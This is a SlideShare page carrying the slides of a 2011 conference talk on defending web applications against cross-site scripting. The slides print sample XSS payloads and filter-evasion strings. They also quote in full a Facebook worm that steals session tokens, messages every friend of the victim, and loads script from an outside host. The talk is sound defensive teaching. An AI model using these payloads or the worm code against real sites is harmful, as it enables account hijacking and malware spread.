SlideShare ist ein Scribd-Unternehmen logo

Avoiding Cross Site Scripting - Not as easy as you might think

Erlend Oftedal
Erlend Oftedal

My talk from NDC2011

Technologie
1 von 60
Avoiding Cross Site Scripting Not as easy as you might think NDC2011 – Erlend Oftedal
Y
Some security experts say it's easy to protect against... but that may not always be the case
Statistics Common error OWASP Top 10 Sans Top 25 Most Dangerous software errors http://info.veracode.com/rs/veracode/images/soss-v3.pdf
XSS - statistics http://info.veracode.com/rs/veracode/images/soss-v3.pdf
  http://security-sh3ll.blogspot.com/2011/05/twitter-xss.html
Risk Stealing data from client Stealing data from server Exploiting the browser Session hijacking Form manipulation - keylogging
    http://telenorsoc.blogspot.com/2008/10/malware-og-drive-by-exploits.html
http://www.bindshell.net/tools/beef/screenshots.html
Why the name Cross Site Scripting? <iframe src="http://mail.google.com"> <script> </iframe>
Same Origin Policy Two frames/windows may only speak if they share: ,[object Object]
the same port
the same protocol ,[object Object]
Demo
What’s going on? <input type="text" name="search" value=""> An input of 123 yields:     <input type="text" name="search" value="123"> An input of hello"world yields:     <input type="text" name="search“ value="hello"world"> An input of hello"><script>alert(1)</script> yields:     <input type="text" name="search"     value="hello"><script>alert(1)</script>">
Types of Cross Site Scripting Reflected Persistent Second order / indirect / side channel
 
 
 
 
  Script/content Data App x
What data can you actually trust? Scripts? Web services? Databases?
Input validation Blacklisting keywords Blacklisting/whitelisting characters
How do you validate input? Input: test Validation: [a-z]+
How do you validate input? Input: "this is a test" Validation: [a-z"]+
How do you validate input? Input: Conan O’Brian Validation: [a-zA-Z"']+
How do you validate input? Input: No, your calculation is wrong, because x > 5 Validation: [a-zA-Z"'>.,]+
How do you validate input? Input: Try moving the <script> tag to the bottom of the page. Validation: [a-zA-Z"‘<>.,]+
ASP.NET Request Validation Throws exception on: &# < followed by a-z, !, ? Or / Can be disabled per page / model field Sometimes good reason to disable Only stops the simpler attacks
Demo
A couple of tricks Build a javascript string without quotes: String.fromCharCode(88, 83, 83) /XSS/.source Running script without user invocation: <img src="x" onerror="alert(1)" /> <input ... Value="" autofocus onfocus="alert(1)" />
HTML escaping – almost there, but not quite System.Web.HttpUtility.HtmlEncode(string s) Replace ,[object Object]
>with &gt;
"with &quote;
'with &#39;
&with &amp;
Ascii 160 to 255 replaced with0#nn;,[object Object]
It's all a matter of context
Per context escaping We need to escape depending on context(s) OWASP XSS Prevention Cheat Sheet Rules for context and escaping
Rule #0 - Forbidden  <script>...NEVER PUT UNTRUSTED DATA HERE...</script>   directly in a script    <!--...NEVER PUT UNTRUSTED DATA HERE...-->           inside an HTML comment    <div...NEVER PUT UNTRUSTED DATA HERE...=test/>      in an attribute name    <NEVER PUT UNTRUSTED DATA HERE... href="/test"/>     in a tag name
Rule#1 – Between tags <div> ...HTML ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE... </div> => HTML escaping
Rule#2 - Attributes Inside unquoted attribute: <divattr=...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...> content </div>       Inside single quoted attribute <div attr='...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...'> content </div>     Inside double quoted attribute <div attr="...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE..."> content </div>      HTML attribute escaping
Rule #3 – in javascript strings Inside a quoted string <script> alert('...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...') </script>     One side of a quoted expression <script> x='...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...' </script>            Inside quoted event handler: <div onmouseover="x='...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...'"></div>   Javascriptescaping NEVER put untrusted data inside strings passed to eval(), setInterval() and similar
Rule #4 – In CSS <style>     selector { property : ...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...; } </style>      <style>     selector { property : "...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE..."; }  </style>   <spanstyle="property : ...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...">     text </span> CSS escaping
Rule#5 - URLs <a href="http://www.somesite.com?test=...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...">link</a> URL escaping
http://www.hackersbay.in/2011/05/facebook-worm-spreading-verify-my.html
var message = "Please do your part in PREVENTING SPAM by VERIFYING YOUR ACCOUNT. Click VERIFY MY ACCOUNT right next to comment below to begin the verification process..."; varjsText= "javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://pelorak.info/verify.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();"; varmyText= "==>[VERIFY MY ACCOUNT]<=="; varpost_form_id= .getElementsByName('post_form_id')[0].value; varfb_dtsg= .getElementsByName('fb_dtsg')[0].value; varuid= .cookie.match( .cookie.match(/c_user=(+)/)[1]); var friends = new (); gf= new XMLHttpRequest(); gf.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=" +uid+ "&"+ .random(),false); gf.send(); if(gf.readyState!=4){ }else{ data = ('(' +gf.responseText.substr(9) + ')'); if(data.error){ }else{ friends =data.payload.entries.sort(function(a,b){return a.index-b.index;}); } } for(var i=0; i<friends.length; i++){ varhttpwp= new XMLHttpRequest(); varurlwp= "http://www.facebook.com/fbml/ajax/prompt_feed.php?__a=1"; varparamswp= "&__d=1&app_id=6628568379&extern=0&" + "&post_form_id=" +post_form_id+ "&fb_dtsg=" +fb_dtsg+ "&feed_info[action_links][0][href]=" + (jsText) + "&feed_info[action_links][0][text]=" + (myText) + "&feed_info[app_has_no_session]=true&feed_info[body_general]=&feed_info[template_id]=60341837091&feed_info[templatized]=0&feed_target_type=target_feed&feedform_type=63&lsd&nctr[_ia]=1&post_form_id_source=AsyncRequest&preview=false&size=2&to_ids[0]=" + friends[i].uid+ "&user_message=" + message; httpwp.open("POST", urlwp, true); httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); httpwp.setRequestHeader("Content-length", paramswp.length); httpwp.setRequestHeader("Connection", "keep-alive"); httpwp.onreadystatechange= function(){ if (httpwp.readyState== 4 &&httpwp.status== 200){ } } httpwp.send(paramswp); } alert("Verification Failed. Click 'OK' and follow the steps to prevent your account from being deleted."); .location = "http://pelorak.info/verify.php?js";
varmyText = "==>[VERIFY MY ACCOUNT]<=="; varjsText = "javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://pelorak.info/verify.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();"; ... For each friend post a message { varurlwp = "http://www.facebook.com/fbml/ajax/prompt_feed.php?__a=1"; varparamswp = "&__d=1&app_id=6628568379&extern=0&" + "&post_form_id=" + post_form_id + "&fb_dtsg=" + fb_dtsg + "&feed_info[action_links][0][href]=" + (jsText) + "&feed_info[action_links][0][text]=" + (myText) + "&feed_info[app_has_no_session]=true&feed_info[body_general]=&feed_info[template_id]=60341837091&feed_info[templatized]=0&feed_target_type=target_feed&feedform_type=63&lsd&nctr[_ia]=1&post_form_id_source=AsyncRequest&preview=false&size=2&to_ids[0]=" + friends[i].uid + "&user_message=" + message; ... }
Rule#6 – Use a policy driven engine Use an HTML Policy engine to validate or clean user-driven HTML in an outbound way. Must be a whitelist based engine. OWASP AntiSamy HtmlPurifier
Why you do NOT write your own HTML-cleaner/sanitizer <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|^`=alert("XSS")> <META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;"> <charset="x-mac-farsi">☼script ☾alert(1)//☼/script ☾ http://ha.ckers.org/xss.html
Rule#7 – Avoid DOM based XSS
DOM based XSS Insecure handling of input in javascript - reading values from: ,[object Object]
native javascript objects/properties like
document.referer
window.location.hashAllows attacks present in URLs that are never seen by the server http://www.somesite.com/#banner=may2011 http://www.somesite.com/#banner=may2011"><script>...
Demo
Demo $(location.hash) $("#<script>alert(1)</script>") http://codesearch.google.com/codesearch?as_q=%22%24%28location.hash%29%22
Avoiding DOM based XSS ,[object Object]
Beware of the complex contexts

Empfohlen

Security asp.net application
Security asp.net applicationSecurity asp.net application
Security asp.net applicationZAIYAUL HAQUE
 
ASP.NET Web Security
ASP.NET Web SecurityASP.NET Web Security
ASP.NET Web SecuritySharePointRadi
 
PCI security requirements secure coding and code review 2014
PCI security requirements secure coding and code review 2014PCI security requirements secure coding and code review 2014
PCI security requirements secure coding and code review 2014Haitham Raik
 
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSSWeb Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSSIvan Ortega
 
PCI Security Requirements - secure coding
PCI Security Requirements - secure codingPCI Security Requirements - secure coding
PCI Security Requirements - secure codingHaitham Raik
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10bilcorry
 
Spring Security 3
Spring Security 3Spring Security 3
Spring Security 3Jason Ferguson
 
Owasp top 10 2013
Owasp top 10 2013Owasp top 10 2013
Owasp top 10 2013Edouard de Lansalut
 

Empfohlen

Security asp.net application
Security asp.net applicationSecurity asp.net application
Security asp.net applicationZAIYAUL HAQUE
 
ASP.NET Web Security
ASP.NET Web SecurityASP.NET Web Security
ASP.NET Web SecuritySharePointRadi
 
PCI security requirements secure coding and code review 2014
PCI security requirements secure coding and code review 2014PCI security requirements secure coding and code review 2014
PCI security requirements secure coding and code review 2014Haitham Raik
 
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSSWeb Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSSIvan Ortega
 
PCI Security Requirements - secure coding
PCI Security Requirements - secure codingPCI Security Requirements - secure coding
PCI Security Requirements - secure codingHaitham Raik
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10bilcorry
 
Spring Security 3
Spring Security 3Spring Security 3
Spring Security 3Jason Ferguson
 
Owasp top 10 2013
Owasp top 10 2013Owasp top 10 2013
Owasp top 10 2013Edouard de Lansalut
 
Common Web Application Attacks
Common Web Application Attacks Common Web Application Attacks
Common Web Application Attacks Ahmed Sherif
 
Beefing Up Security In ASP.NET Dot Net Bangalore 3rd meet up on May 16 2015
Beefing Up Security In ASP.NET Dot Net Bangalore 3rd meet up on May 16 2015Beefing Up Security In ASP.NET Dot Net Bangalore 3rd meet up on May 16 2015
Beefing Up Security In ASP.NET Dot Net Bangalore 3rd meet up on May 16 2015gmaran23
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesCarol McDonald
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
Owasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesOwasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesMarco Morana
 
Owasp top 10_openwest_2019
Owasp top 10_openwest_2019Owasp top 10_openwest_2019
Owasp top 10_openwest_2019Sean Jackson
 
Spring Security Introduction
Spring Security IntroductionSpring Security Introduction
Spring Security IntroductionMindfire Solutions
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013tmd800
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...Noppadol Songsakaew
 
Web application attacks
Web application attacksWeb application attacks
Web application attackshruth
 
Secure code practices
Secure code practicesSecure code practices
Secure code practicesHina Rawal
 
Owasp webgoat
Owasp webgoatOwasp webgoat
Owasp webgoatZakaria SMAHI
 
From 0 to Spring Security 4.0
From 0 to Spring Security 4.0From 0 to Spring Security 4.0
From 0 to Spring Security 4.0robwinch
 
Spring security
Spring securitySpring security
Spring securitySaurabh Sharma
 
Spring Security
Spring SecuritySpring Security
Spring SecurityManish Sharma
 
Spring Security
Spring SecuritySpring Security
Spring SecurityBoy Tech
 
OWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsOWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsKaty Anton
 
OWASP Khartoum Top 10 A3 - 6th meeting
OWASP Khartoum Top 10 A3 - 6th meetingOWASP Khartoum Top 10 A3 - 6th meeting
OWASP Khartoum Top 10 A3 - 6th meetingOWASP Khartoum
 
OWASP Serbia - A3 broken authentication and session management
OWASP Serbia - A3 broken authentication and session managementOWASP Serbia - A3 broken authentication and session management
OWASP Serbia - A3 broken authentication and session managementNikola Milosevic
 
Spring Security
Spring SecuritySpring Security
Spring SecuritySumit Gole
 
What Makes Great Infographics
What Makes Great InfographicsWhat Makes Great Infographics
What Makes Great InfographicsSlideShare
 
You Suck At PowerPoint!
You Suck At PowerPoint!You Suck At PowerPoint!
You Suck At PowerPoint!Jesse Desjardins - @jessedee
 

Weitere ähnliche Inhalte

Was ist angesagt?

Common Web Application Attacks
Common Web Application Attacks Common Web Application Attacks
Common Web Application Attacks Ahmed Sherif
 
Beefing Up Security In ASP.NET Dot Net Bangalore 3rd meet up on May 16 2015
Beefing Up Security In ASP.NET Dot Net Bangalore 3rd meet up on May 16 2015Beefing Up Security In ASP.NET Dot Net Bangalore 3rd meet up on May 16 2015
Beefing Up Security In ASP.NET Dot Net Bangalore 3rd meet up on May 16 2015gmaran23
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesCarol McDonald
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
Owasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesOwasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesMarco Morana
 
Owasp top 10_openwest_2019
Owasp top 10_openwest_2019Owasp top 10_openwest_2019
Owasp top 10_openwest_2019Sean Jackson
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013tmd800
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...Noppadol Songsakaew
 
Web application attacks
Web application attacksWeb application attacks
Web application attackshruth
 
Secure code practices
Secure code practicesSecure code practices
Secure code practicesHina Rawal
 
From 0 to Spring Security 4.0
From 0 to Spring Security 4.0From 0 to Spring Security 4.0
From 0 to Spring Security 4.0robwinch
 
Spring Security
Spring SecuritySpring Security
Spring SecurityBoy Tech
 
OWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsOWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsKaty Anton
 
OWASP Khartoum Top 10 A3 - 6th meeting
OWASP Khartoum Top 10 A3 - 6th meetingOWASP Khartoum Top 10 A3 - 6th meeting
OWASP Khartoum Top 10 A3 - 6th meetingOWASP Khartoum
 
OWASP Serbia - A3 broken authentication and session management
OWASP Serbia - A3 broken authentication and session managementOWASP Serbia - A3 broken authentication and session management
OWASP Serbia - A3 broken authentication and session managementNikola Milosevic
 
Spring Security
Spring SecuritySpring Security
Spring SecuritySumit Gole
 

Was ist angesagt? (20)

Common Web Application Attacks
Common Web Application Attacks Common Web Application Attacks
Common Web Application Attacks
 
Beefing Up Security In ASP.NET Dot Net Bangalore 3rd meet up on May 16 2015
Beefing Up Security In ASP.NET Dot Net Bangalore 3rd meet up on May 16 2015Beefing Up Security In ASP.NET Dot Net Bangalore 3rd meet up on May 16 2015
Beefing Up Security In ASP.NET Dot Net Bangalore 3rd meet up on May 16 2015
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security Vulnerabilities
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
 
Owasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesOwasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root Causes
 
Owasp top 10_openwest_2019
Owasp top 10_openwest_2019Owasp top 10_openwest_2019
Owasp top 10_openwest_2019
 
Spring Security Introduction
Spring Security IntroductionSpring Security Introduction
Spring Security Introduction
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...
 
Web application attacks
Web application attacksWeb application attacks
Web application attacks
 
Secure code practices
Secure code practicesSecure code practices
Secure code practices
 
Owasp webgoat
Owasp webgoatOwasp webgoat
Owasp webgoat
 
From 0 to Spring Security 4.0
From 0 to Spring Security 4.0From 0 to Spring Security 4.0
From 0 to Spring Security 4.0
 
Spring security
Spring securitySpring security
Spring security
 
Spring Security
Spring SecuritySpring Security
Spring Security
 
Spring Security
Spring SecuritySpring Security
Spring Security
 
OWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsOWASP Top 10 Proactive Controls
OWASP Top 10 Proactive Controls
 
OWASP Khartoum Top 10 A3 - 6th meeting
OWASP Khartoum Top 10 A3 - 6th meetingOWASP Khartoum Top 10 A3 - 6th meeting
OWASP Khartoum Top 10 A3 - 6th meeting
 
OWASP Serbia - A3 broken authentication and session management
OWASP Serbia - A3 broken authentication and session managementOWASP Serbia - A3 broken authentication and session management
OWASP Serbia - A3 broken authentication and session management
 
Spring Security
Spring SecuritySpring Security
Spring Security
 

Andere mochten auch

What Makes Great Infographics
What Makes Great InfographicsWhat Makes Great Infographics
What Makes Great InfographicsSlideShare
 
STOP! VIEW THIS! 10-Step Checklist When Uploading to Slideshare
STOP! VIEW THIS! 10-Step Checklist When Uploading to SlideshareSTOP! VIEW THIS! 10-Step Checklist When Uploading to Slideshare
STOP! VIEW THIS! 10-Step Checklist When Uploading to SlideshareEmpowered Presentations
 
Masters of SlideShare
Masters of SlideShareMasters of SlideShare
Masters of SlideShareKapost
 
A Guide to SlideShare Analytics - Excerpts from Hubspot's Step by Step Guide ...
A Guide to SlideShare Analytics - Excerpts from Hubspot's Step by Step Guide ...A Guide to SlideShare Analytics - Excerpts from Hubspot's Step by Step Guide ...
A Guide to SlideShare Analytics - Excerpts from Hubspot's Step by Step Guide ...SlideShare
 
How To Get More From SlideShare - Super-Simple Tips For Content Marketing
How To Get More From SlideShare - Super-Simple Tips For Content MarketingHow To Get More From SlideShare - Super-Simple Tips For Content Marketing
How To Get More From SlideShare - Super-Simple Tips For Content MarketingContent Marketing Institute
 
10 Ways to Win at SlideShare SEO & Presentation Optimization
10 Ways to Win at SlideShare SEO & Presentation Optimization10 Ways to Win at SlideShare SEO & Presentation Optimization
10 Ways to Win at SlideShare SEO & Presentation OptimizationOneupweb
 
How to Make Awesome SlideShares: Tips & Tricks
How to Make Awesome SlideShares: Tips & TricksHow to Make Awesome SlideShares: Tips & Tricks
How to Make Awesome SlideShares: Tips & TricksSlideShare
 

Andere mochten auch (8)

What Makes Great Infographics
What Makes Great InfographicsWhat Makes Great Infographics
What Makes Great Infographics
 
You Suck At PowerPoint!
You Suck At PowerPoint!You Suck At PowerPoint!
You Suck At PowerPoint!
 
STOP! VIEW THIS! 10-Step Checklist When Uploading to Slideshare
STOP! VIEW THIS! 10-Step Checklist When Uploading to SlideshareSTOP! VIEW THIS! 10-Step Checklist When Uploading to Slideshare
STOP! VIEW THIS! 10-Step Checklist When Uploading to Slideshare
 
Masters of SlideShare
Masters of SlideShareMasters of SlideShare
Masters of SlideShare
 
A Guide to SlideShare Analytics - Excerpts from Hubspot's Step by Step Guide ...
A Guide to SlideShare Analytics - Excerpts from Hubspot's Step by Step Guide ...A Guide to SlideShare Analytics - Excerpts from Hubspot's Step by Step Guide ...
A Guide to SlideShare Analytics - Excerpts from Hubspot's Step by Step Guide ...
 
How To Get More From SlideShare - Super-Simple Tips For Content Marketing
How To Get More From SlideShare - Super-Simple Tips For Content MarketingHow To Get More From SlideShare - Super-Simple Tips For Content Marketing
How To Get More From SlideShare - Super-Simple Tips For Content Marketing
 
10 Ways to Win at SlideShare SEO & Presentation Optimization
10 Ways to Win at SlideShare SEO & Presentation Optimization10 Ways to Win at SlideShare SEO & Presentation Optimization
10 Ways to Win at SlideShare SEO & Presentation Optimization
 
How to Make Awesome SlideShares: Tips & Tricks
How to Make Awesome SlideShares: Tips & TricksHow to Make Awesome SlideShares: Tips & Tricks
How to Make Awesome SlideShares: Tips & Tricks
 

Ähnlich wie Avoiding Cross Site Scripting - Not as easy as you might think

Django Web Application Security
Django Web Application SecurityDjango Web Application Security
Django Web Application Securitylevigross
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web AppsFrank Kim
 
Joomla security nuggets
Joomla security nuggetsJoomla security nuggets
Joomla security nuggetsguestbd1cdca
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threatAvădănei Andrei
 
Don't get stung - an introduction to the OWASP Top 10
Don't get stung - an introduction to the OWASP Top 10Don't get stung - an introduction to the OWASP Top 10
Don't get stung - an introduction to the OWASP Top 10Barry Dorrans
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL InjectionJoe McCray
 
Building Secure Twitter Apps
Building Secure Twitter AppsBuilding Secure Twitter Apps
Building Secure Twitter AppsDamon Cortesi
 
Defending Against Attacks With Rails
Defending Against Attacks With RailsDefending Against Attacks With Rails
Defending Against Attacks With RailsTony Amoyal
 
Web Security Mistakes: Trusting The Client
Web Security Mistakes: Trusting The ClientWeb Security Mistakes: Trusting The Client
Web Security Mistakes: Trusting The Clientgrutz
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009mirahman
 
General Principles of Web Security
General Principles of Web SecurityGeneral Principles of Web Security
General Principles of Web Securityjemond
 
Clickjacking DevCon2011
Clickjacking DevCon2011Clickjacking DevCon2011
Clickjacking DevCon2011Krishna T
 

Ähnlich wie Avoiding Cross Site Scripting - Not as easy as you might think (20)

PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
 
Django Web Application Security
Django Web Application SecurityDjango Web Application Security
Django Web Application Security
 
&lt;img src="xss.com">
&lt;img src="xss.com">&lt;img src="xss.com">
&lt;img src="xss.com">
 
Fav
FavFav
Fav
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web Apps
 
Joomla security nuggets
Joomla security nuggetsJoomla security nuggets
Joomla security nuggets
 
Web Security
Web SecurityWeb Security
Web Security
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
 
Don't get stung - an introduction to the OWASP Top 10
Don't get stung - an introduction to the OWASP Top 10Don't get stung - an introduction to the OWASP Top 10
Don't get stung - an introduction to the OWASP Top 10
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injection
 
PHP Security
PHP SecurityPHP Security
PHP Security
 
Building Secure Twitter Apps
Building Secure Twitter AppsBuilding Secure Twitter Apps
Building Secure Twitter Apps
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
 
Defending Against Attacks With Rails
Defending Against Attacks With RailsDefending Against Attacks With Rails
Defending Against Attacks With Rails
 
Web Security Mistakes: Trusting The Client
Web Security Mistakes: Trusting The ClientWeb Security Mistakes: Trusting The Client
Web Security Mistakes: Trusting The Client
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009
 
General Principles of Web Security
General Principles of Web SecurityGeneral Principles of Web Security
General Principles of Web Security
 
Clickjacking DevCon2011
Clickjacking DevCon2011Clickjacking DevCon2011
Clickjacking DevCon2011
 
Ajax Security
Ajax SecurityAjax Security
Ajax Security
 

Kürzlich hochgeladen

Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?Antenna Manufacturer Coco
 

Kürzlich hochgeladen (20)

Powerful Google developer tools for immediate impact! (2023-24 C)
